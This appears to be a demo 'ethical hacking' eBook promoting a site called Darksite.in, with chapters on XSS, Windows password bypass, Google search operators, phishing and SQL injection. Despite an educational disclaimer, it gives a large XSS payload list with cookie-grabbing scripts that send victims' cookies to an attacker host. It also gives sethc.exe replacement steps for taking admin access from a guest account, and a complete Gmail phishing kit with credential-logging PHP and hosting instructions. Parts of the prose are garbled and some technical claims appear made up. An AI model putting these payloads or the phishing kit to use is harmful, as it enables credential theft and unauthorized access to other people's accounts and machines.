ACKNOWLEDGEMENT

For any successful work, it owes to thank many

No one walks alone & when one is walking on the journey of life just where you start to thank those that joined you, walked beside you & helped you along the way. Over the years, those that I have met & worked with have continuously urged me to write a book, to share my knowledge & skills on paper & to share my insights together with the secrets to my continual, positive approach to life and all that life throws at us. So at last, here it is. So, perhaps this book & its pages will be seen as thanks to the tens of thousands of you who have who have helped to make my life what is today. Hard work, knowledge, dedication & positive attitude all are necessary to do any task successfully but one ingredient which is also very important than others is cooperation & guidance of experts & experienced person. All the words is lexicon futile & meaningless if I fail to express my sense of regard to my parents & sister for their sacrifices, blessings, prayers, everlasting love & pain & belief in me. I express heartfelt credit to My Parents Mr. Durgu Nial and Mrs. Manju Nial. I also like thanks to My Elder Brother LaxmiKant Nial, My Uncle Mr.Debashish Rout and all my Family members For their Priceless supports. I also like to thanks to Suranjan Mund And Gobinda Seth for making me introducing Me to internet. Finally to My room Mates and all my beloved friends without you friends I would never reach this position thank you friend. To finish, I am thankful to you also as you are reading this book. I solely claim all the responsibility for any shortcomings & limitations in this book.

Legal Disclaimer
The information provided in this eBook is to be used for educational purposes only. The author holds no responsibility for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. The word Hack or Hacking in this eBook should be regarded as Ethical Hack or Ethical hacking respectively.

About the Author

ChandraKant Nial is CEO and Founder of the Darksite.in, visit darksite.in for lot of ethical hacking and new technology learning and gain knowledge. I am a student and a quick learner. I do what I love and I love what I do. Contact me: chandrakantnial8@gmail.com

www.darksite.in

=>Introduction =>Xss Attack =>Winows hacking =>Google hacking =>Phishing Attack =>SQL Injection =>Darksites Links (Very Useful and Important)

[This Just an demo Book Tried By Chandrakant Nial For Darksite.in Many Contents more then 50+ Will be added on the full version of the book I need a good support from the readers and if any publisher wish to publish hard copy of my book or anyone having any such motive contact me at my E-mail (chandrakantnial8@gmail.com) address Thank you.]

(WIFI Hacking, Phone Phreaking ,Android tricks, Cell phone rooting, Latest Mobile Tricks, Phishing, E-mail hacking, Hardware hacking ,Web server hacking ,Serious Google dorks, Many website hacking, Trojan Attack ,Windows hacking , Web vulnerability, Remote File Uploading Vulnerability , Hacking using key loggers Complete tutorial, Server rooting, Defacing sites easily, Joomla sites hacking, Backtrack and Its usages for hacking ,Many New Face book tricks ,YouTube hackings , Linux password breaking, bios password breaking, Spoofingsand many more I have already given few of them in DARKSITE LINK but I will putting them all in my final book)

Stay Connected with DARKSITE for More Updates

Introduction
Cyber Forensics
Cyber forensics is otherwise also known as computer forensics. Computer forensics is an art and science of applying computer science to aid the legal process. Cyber forensics also includes the act of making digital data suitable for inclusion into a criminal investigation. Today cyber forensics is a term used in conjunction with law enforcement, and is offered as courses at many colleges and universities worldwide.

Over view
In the early 1980s personal computers became more accessible to consumers leading to their increased use in criminal activity (for example, to help commit fraud). At the same time, several new "computer crimes" were recognized (such as hacking). Since then computer crime and computer related crime has grown exponentially, and even has jumped 67% between 2002 and 2003. Today it is used to investigate a wide variety of crime, including fraud, stealing information, cyber stalking. Forensic techniques and expert knowledge are used to explain the current state of a digital artifact; such as a computer system. The scope of a forensic analysis can vary from simple information retrieval to reconstructing a series of events. In a 2002 book Computer Forensics authors Kruse and Heiser define computer forensics as involving "the preservation, identification, extraction, documentation and interpretation of computer data".They go on to describe the discipline as "more of an art than a science", indicating that forensic methodology is backed by flexibility and extensive domain knowledge. However, while several methods can be used to extract evidence from a given computer the strategies used by law enforcement are fairly rigid and lacking the flexibility found in the civilian world. In current scenario cyber world plays major role among all the people, life is quite impossible without internet, internet is now available everywhere as I always say DAYs BEGINs WITH INTERNET. Cyber forensics plays very much Important and crucial role in our day to day life.

ETHICAL HACKER
An ethical hacker is a computer and network expert who attacks a security system on behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To test a security system, ethical hackers use the same methods as their less principled counterparts, but report problems instead of taking advantage of them. Ethical hacking sometime also known as penetration testing, intrusion testing and red teaming.

XSS Attack
Cross-site scripting or XSS is a threat to a website's security. It is the most common and popular hacking a website to gain access information from a user on a website. There are hackers with malicious objectives that utilize this to attack certain websites on the Internet. But mostly good hackers do this to find security holes for websites and help them find solutions. It would be advantageous for website owners to understand how cross-site scripting works and how it can affect them and their users so they could place the necessary security systems to block cross-site scripting on their website. Cross Site Scripting is a technique used to add script to a trusted site that will be executed on other users browsers. A key element to XSS is that one user can submit data to a website that will later be displayed for other users. It is necessary that the bad guy NOT Mess up the HTML structure otherwise the result will be web defacement rather than attacking other users. Cross-Site Request Forgery, also known as one click attack or session riding and abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites. Although this type of attack has similarities to cross-site scripting (XSS), cross-site scripting requires the attacker to inject unauthorized code into a website, while crosssite request forgery merely transmits unauthorized commands from a user the website trusts.

Types of XSS
Non President XSS This is one of the most common types of XSS attacks you will find. These types of XSS attacks are possible when user supplied data is instantly used by server side scripts to generate a page, based on the users input. President XSS The persistent (or stored) XSS vulnerability is a more devastating variant of a crosssite scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read.

DOM Based XSS DOM Based Cross-Site Scripting is the de-facto name for XSS bugs which are the result of active browser-side content on a page, typically JavaScript, obtaining user input and then doing something unsafe with it which leads to execution of injected code. This document only discusses JavaScript bugs which lead to XSS XSS Query List

</ Textarea> <script> alert (/ xss /) </ script> </ Title> <script> alert (/ xss /) </ script> <script src=http://yoursite.com/your_files.js> </ script> "> <script> Alert (0) </ script> <IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))> <IMG SRC=\"javascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <marquee> <script> alert ('XSS') </ script> </ marquee> <? echo ('<scr)';echo('ipt> alert (\ "XSS \") </ script>');?> <style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \ ")';</ style> <img src=foo.png onerror=alert(/xssed/) /> <script> alert (String.fromCharCode (88,83,83)) </ script> <Scr <script> ipt> alert ('XSS');</ scr </ script> ipt> <script>location.href="http://www.yourevilsite.org/cookiegrabber.php ?cookie="+escape(document.cookie)</script> <script src="http://www.yourevilsite.org/cookiegrabber.php"> </ script> <script> alert ('XSS');</ script> <script> alert (1); </ script> <IMG LOWSRC = \ "javascript: Alert ('XSS') \ "> <IMG DYNSRC = \ "javascript: Alert ('XSS') \ "> <font Here arestyle='color:expression(alert(document.cookie))'> More Xss scripts that you may like Link to Practice Xss <Img src = "javascript: Alert ('XSS') "> <script language="JavaScript"> alert ('XSS') </ script>

<Body onunload = "javascript: Alert ('XSS');"> <Body onLoad = "alert ('XSS');" [Color = red 'onmouseover = "alert (' xss')"] mouse over [/ color] "/></ A ></>< img src = 1.gif onerror = alert (1)> window.alert ("Bonjour!"); <div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo de(88,83,83));'))"> <Iframe <? Php echo chr (11)?> Onload = alert ('XSS')></ iframe> "> <Script alert (String.fromCharCode (88,83,83)) </ script> '>> <marquee> <h1> XSS </ h1> </ marquee> '">>< Script> alert ('XSS') </ script> '">>< Marquee> <h1> XSS </ h1> </ marquee> <META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; url = javascript: Alert ('XSS'); \ "> <META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; URL = http://; URL = javascript: Alert ('XSS'); \ "> <script> var var = 1; alert (var) </ script> <STYLE Type="text/css"> BODY {background: url ("javascript: Alert ('XSS')")}</ STYLE> <?='< SCRIPT> alert ("XSS") </ SCRIPT> '?> <IMG SRC = 'vbscript: Msgbox (\ "XSS \") '> "Onfocus = alert (document.domain)"> <" <FRAMESET> <FRAME SRC = \ "javascript: Alert ('XSS'); \ "> </ FRAMESET> <STYLE> Li {list-style-image: url (\ "javascript: Alert ('XSS') \ ");}</ STYLE> <UL> <LI> XSS perl-e 'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";'> out perl-e 'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";'> out <br size=\"&{alert('XSS')}\">

See XssCompleteTutorial from (Darksite)

What is hacking?
In simple word Hacking is a process to bypass the security mechanisms of an information system or network. Or We can also describe Hacking is an unauthorized use of computer and network resources. (The term "hacker" originally meant a very gifted programmer. In recent years though, with easier access to multiple systems it now has negative implications.) Types of Hacking 1. Local Hacking Local hacking is done from local area where we have physical access, like through printer etc. We do this type of hacking through Trojans and viruses with the help of hard disk and pendrive. 2. Remote Hacking Remote hacking is done remotely by taking advantage of the vulnerability of the target system. We need to follow steps for remote hacking to enter on target system. 3. Social Engineering Social engineering is the act of manipulating people into performing actions or divulging confidential information. While similar to a confidence trick or simple fraud, the term typically applies to trickery or deception for the purpose of information gathering, fraud, or computer system access; in most cases the attacker never comes face-to-face.

Types of Hackers
General Categories Of hacker: = Black-Hat Unauthorized break-ins (malicious intent including crackers) White-Hat Debug or correct security vulnerabilities Main focus: secure/protect IT systems Gray-Hat Morally Ambiguous. Black-Hat skills, White-Hat tasks?

Windows Passwod hacking

There are many different methods that exists we will b discussing very few of them

Here are those

ERD Commander
1. 2. 3. 4. Start your computer and enter into Bios Setup. Change your boot preferences to boot from CD /DVD. Insert your ERD Commander Bootable CD. Once the ERD Commander starts booting it will ask you for Windows Installation, select appropriate installation for which you need to reset passwod

Once ERD is loaded it will present you a interface similar to windows.Click the START button, Select System Tools > and then select Locksmith.

Enter you new password and close Click Start Button again and restart the PC

This is one of the classic methods used to hack windows xp password perfectly working

Method 2
Break Windows Admin Password Using
Downlod Oph Crack XP Live CD Link Downlaod Oph Crack Vista Live CD Link

Ophcrack Live CD

Boot your pc with ophcrack LiveCD and your Password will be Automatically Broke.

Method 3
Hack Windows Password with the Help of Hirens Boot CD

Methiod 4
Break Password Of Windows 7 and Server 2008 with Syskey Syskey download link

Hack Admin Password from Guest Account

For XP User
Go to C:\windows\system32 Copy cmd.exe on your desktop Rename it to sethc.exe. Now copy that file and paste again in system32 directory. When windows ask for overwriting the file, then click yes. Now Log out from your guest account and at the user select window, press shift key 5 times or Left (ALT+Shift+ Num Lock).

For Windows 7 User

Right click on sethc.exe and run as administrator.

Right click on sethc.exe, Click on properties. and Click on Advanced tab

Now Select your Current user and click on Change Permissions

Now Click on Edit

Now Click on Full Control Check Box and Click OK

Copy the New sethc.exe to system32, and click copy and replace

Now Restart your PC

Resetting the Password

Once you get to the login screen, hit the Shift key 5 times, and youll see an administrator mode command prompt.

Now to reset the passwordjust type the following command, replacing the username and password with the combination you want: Command : net user account.name * Example: net userdarksite * and hit enter. Set any password for that account

Now its done Method 6

Using Proactive System Password Recovery

Method 7 Using Active Password Changer
All these methods are explained in details with screen shot in the premium Book This Book is just and demo Book.

Window 7 Actvation Without Crack (Darksitelink)

What actually does?

Google has a very simple formula of being worlds top site.google has its own crawlers and spidrals. Now the question ariases what is crawlers? Crawlers are used just to chat with the links presents on a site.they have nothing to with the site content of site or type of site all they do is just dig the number of links present in the site . Some famous Crawlers are BOST, ZINCNIC, and RAVCEetc. What is Spidral? Spidrals read the Meta tag, heading, paragraph tag of the html page or indirectly spidrals read the content of the site. Some spidrals are vozic, hypingetc Altavista, yahoo, rediff, BAIDUetc Every search engines has it own crawlers and spidrals but google has the strong out of them. These crawler and spidrals can me make disabling visiting to a site by the help of robots.txt Crawler and spidrals never visit the links having robots.txt they simply ignore those parts of the site. Here below we are discussing some smart search that one should know.

Alternate query types Cache:

If you include other words in the query, Google will highlight those words within the cached document. For instance, [cache: www.google.com web] will show the cached content with the word "web" highlighted. Its shows the previously stored information about the sites , its shows the catches about the page.. This functionality is also accessible by clicking on the "Cached" link on Google's main results page.

The query [cache:]

This will show the version of the web page that Google has in its cache. For instance, [cache: www.google.com] will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.

Link:
Shows the links regarding the sites The query [link:] This will list webpages that have links to the specified webpage. For instance, [link: www.google.com] will list webpages that have links pointing to the Google homepage. Note there can be no space between the "link:" and the web page url. This functionality is also accessible from the Advanced Search page, under Page Specific Search > Links.

Related:
Shows the related information.

The query [related:]

This will list web pages that are "similar" to a specified web page. For instance, [related: www.google.com] will list web pages that are similar to the Google homepage. Note there can be no space between the "related:" and the web page url. This functionality is also accessible by clicking on the "Similar Pages" link on Google's main results page, and from the Advanced Search page, under Page Specific Search > Similar.

Info:
Provides the more information about the site.

The query [info:]

This will present some information that Google has about that web page. For instance, [info: www.google.com] will show information about the Google homepage. Note there can be no space between the "info:" and the web page url. This functionality is also accessible by typing the web page url directly into a Google search box. Other information needs

Define:
Define the site clearly.

The query [define:]

Will provide a definition of the words you enter after it, gathered from various online sources. The definition will be for the entire phrase entered (i.e., it will include all the words in the exact order you typed them).

Stocks:
If you begin a query with the [stocks:] operator, Google will treat the rest of the query terms as stock ticker symbols, and will link to a page showing stock information for those symbols. For instance, [stocks: intc yhoo] will show information about Intel and Yahoo. (Note you must type the ticker symbols, not the company name.) This functionality is also available if you search just on the stock symbols (e.g. [ intc yhoo ]) and then click on the "Show stock quotes" link on the results page.

Query modifiers
site:
If you include [site:] in your query, Google will restrict the results to those websites in the given domain. For instance, [help site: www.google.com] will find pages about help within www.google.com. [Help site:com] will find pages about help within .com urls. Note there can be no space between the "site:" and the domain. This functionality is also available through Advanced Search page, under Advanced Web Search > Domains.

allintitle:
If you start a query with [allintitle:] Google will restrict the results to those with all of the query words in the title. For instance, [allintitle: google search] will return only documents that have both "google" and "search" in the title. This functionality is also available through Advanced Search page, under Advanced Web Search > Occurrences.

intitle:
If you include [intitle:] in your query, Google will restrict the results to documents containing that word in the title. For instance, [intitle:google search] will return documents that mention the word "google" in their title, and mention the word "search" anywhere in the document (title or no). Note there can be no space between the "intitle:" and the following word. Putting [intitle:] In front of every word in your query is equivalent to putting [allintitle:] at the front of your query: [intitle:google intitle:search] is the same as [allintitle: google search].

allinurl:
If you start a query with [allinurl:], Google will restrict the results to those with all of the query words in the url. For instance, [allinurl: google search] will return only documents that have both "google" and "search" in the url. Note that [allinurl:] works on words, not url components. In particular, it ignores punctuation. Thus, [allinurl: foo/bar] will restrict the results to page with the words "foo" and "bar" in the url, but won't require that they be separated by a slash within that url, that they be adjacent, or that they be in that particular word order. There is currently no way to enforce these constraints. This functionality is also available through Advanced Search page, under Advanced Web Search > Occurrences.

inurl:
If you include [inurl:] in your query, Google will restrict the results to documents containing that word in the url. For instance, [inurl:google search] will return documents that mention the word "google" in their url, and mention the word "search" anywhere in the document (url or no). Note there can be no space between the "inurl:" and the following word. Putting "inurl:" in front of every word in your query is equivalent to putting "allinurl:" at the front of your query: [inurl:google inurl:search] is the same as [allinurl: google search].

[DARKSITE LINKS]

Google Secret Pages How to use GOOGLE for Hacking Unproteced Camera Acess with Google Offline Google search without internet Google Dorks
(MANY MORE SUCH TRICKS AND TIPS WITH GOOGLE WILL BE GIVEN IN FULL VERSION OF THIS BOOK I WILL PUT SOME DEADLY SERIOUS HACKING WITH GOOGLE AND MANY GOOGLE DROKS IN THAT BOOK.)

PHISHING ATTACK
Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies.)

How E-mail account got hacked? [javascript: alert(document.getElementById('Passwd').value); ] Using Weak Password, Keyloggers, coockees , temprarory files, Sniffers (packet capturing software) E- Mail click Attacks (Incrasing Rapidly) Trojans,spams,email Bom Attracting towards Hackers (Social Engineering) Insufficient knowledge About Phishing Protection Tips Use Anti keyloggers software, Good Antivirus, Firewall software. Strong Password (containing symbols,numbers,characters, should not same as username),do not give personal information to other. Securing from sniffing (run type (arp-a if it shows 4-5 Mac address then u r in trouble) Avoid clicking On Unknown Link or Adds

What happens in phishing attack?

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page. 2. Victim enters his credentials in fake login page that goes to attacker. 3. Victim is then redirected to an error page or genuine website depending on attacker. But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.And also there exists many other methods also But I am describing Phishing in simple way here see below tutorial Files that are needed:
1. phishing.php 2. index.html 3. password.txt

Step 1: Creating phishing.php file First of all we need a PHP script which will collect all the form data. Copy the following code in a text editor (notepad) and save it as phishing.php :Phishing.php CODE: <html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.google.com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>

Step 2 : Creating index.html page Goto Gmail.com (without logging in) , Right click anywhere in the browser and choose view page source Or (Save the page and ) Open the source code in a text editor (notepad).

Step 3 Main Part: Now new windows will pop-up where you can see all the HTML code. We need to look for word action. Press CRTL+F and search for action. You will find two action in the code so choose the right one by looking up the following screen-shot (ie, with form id="gaia_loginform"). Replace the link after action between the "..... " with phishing.php (as in the screen-shot)and save this page as index.html (not index.html.txt!!!).

Step 4: Creating text file (password.txt) Now make a new empty text file and name it password.txt Now you have all the three files required

Step 5: Final step Upload all the 3 files in file manager of your web hosting. If you don't have your own web hosting at present, search for a free web hosting site which gives PHP access. I prefer www.phpzilla.net. (Top Free Webhosting sites list) Sign up for a free web hosting plan on this site. Goto file manager and Upload all the 3 files and save it. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page. Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake. Download these three files here (Ready made... :-))

Security Tips
Check Any Site for Originality Here DO Not Get Hacked By Phishing Attack

What is SQL injection??

An SQL injection is often used to attack the security of a website by inputting SQL statements in a web form to get a poorly designed website to perform operations on the database (often to dump the database content to the attacker) other than the usual operations as intended by the designer. SQL injection is a code injection technique that exploits security vulnerability in a website's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL commands are thus injected from the web form into the database of an application (like queries) to change the database content or dump the database information like credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.

(Darksitelink)
SQLInjection Complete Tutorial

Havij Sqli Best tool Blind Sqli complete Tutorial

More on Hacking From Darksite Links Face book Id | Account Hacking AND Face book Tricks Web Vulnerability And Hacks ATM Hacking And Protection Spoofing MAC Spoofing Caller ID Spoofing E-mail Spoofing Windows How To Create Bootable Pendrive AND Also Using DOS Command Prompt Password Cracking Tools AND Key Loggers Changing XP Sp2 to Sp3 SIXTH SENSE TECHNOLOGY (I Support sixth sense technology) How to make own sixth sense device Sparsh Touch-Copy-Paste Technology Without Mouse Cursor Controlling

5G Technology
There are many useful links available in DARKSITE I suggest every reader of this book to please go through Darksite and I am sure you will learn many more things and for the daily viewers stay connected with Darksite to learn more on technology..Thank you.

Raj Chandel Prayas klushrestha RuchiParna Choudhary Ashish Kohli

Reference 1. Google.co.in 2. Face book.com 3. WIKIPEDIA